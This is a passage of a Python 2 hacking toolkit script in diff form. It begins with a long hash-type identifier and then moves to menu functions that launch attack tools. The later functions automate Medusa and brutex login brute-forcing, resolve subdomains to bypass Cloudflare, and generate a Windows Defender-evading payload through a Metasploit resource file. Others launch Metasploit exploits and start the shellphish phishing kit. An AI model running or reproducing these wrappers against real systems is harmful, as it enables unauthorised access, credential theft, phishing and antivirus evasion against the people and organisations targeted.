jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +#------------------# +#FIND HASH TYPE END# + + +#RESTART SCRIPT START# +#--------------------# +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +#------------------# +#RESTART SCRIPT END# + + +#MEDUSA AUTOMATED START# +#----------------------# +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +#--------------------# +#MEDUSA AUTOMATED END# + + +#WAF DETECTER START# +#------------------# +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +#----------------# +#WAF DETECTER END# + + +#CLOUDFLARE BYPASS START# +#-----------------------# +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +#---------------------# +#CLOUDFLARE BYPASS END# + + +#BRUTEFORCE ALL SERVICES ON WEB START# +#------------------------------------# +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +#----------------------------------# +#BRUTEFORCE ALL SERVICES ON WEB END# + + +#METERPRETER HELP MENU START# +#---------------------------# +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +#-------------------------# +#METERPRETER HELP MENU END# + + +#WINDOWS DEFENDER BYPASS START# +#-----------------------------# +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') + os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') + os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) + os.system('echo "run\n" >> winbyp.rc') + os.system("service postgresql restart") + os.system('msfconsole -r winbyp.rc') + os.system('rm -rf winbyp.rc') +#---------------------------# +#WINDOWS DEFENDER BYPASS END# + + +#USE A EXPLOIT START# +#-------------------# +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> exploit.rc'.format(f)) + os.system('echo "show options\n" >> exploit.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r exploit.rc') + os.system('rm -rf exploit.rc') +#-----------------# +#USE A EXPLOIT END# + + +#PHISHING AUTOMATED START# +#------------------------# +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +#----------------------# +#PHISHING AUTOMATED END# + + +#LIST DATABASE INFO START# +#------------------------# +def datalist(): + os.system('echo "hosts\n" >> data.rc') + os.system('echo "services\n" >> data.rc') + os.system("service postgresql restart") + os.system('msfconsole -r data.rc') + os.system('rm -rf data.rc') +#----------------------# +#LIST DATABASE INFO END# + + +#ALL METASPLOIT EVASIONS START# +#-----------------------------# +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +#---------------------------# +#ALL METASPLOIT EVASIONS END# + + +#FULLY UPDATE YOUR OS START# +#--------------------------# +def upgrade(): + os.system("apt update && apt upgrade") +#------------------------# +#FULLY UPDATE YOUR OS END# + + +#USE A NMAP SCRIPT START# +#-----------------------# +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +#---------------------# +#USE A NMAP SCRIPT END# + + +#GET HOST SSH VERSION START# +#--------------------------# +def sshver(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + b = raw_input(G+"Timeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -r sshver.rc') + os.system('rm -rf sshver.rc') +#------------------------# +#GET HOST SSH VERSION END# + + +#USE PROXYCHAINS FOR WEB START# 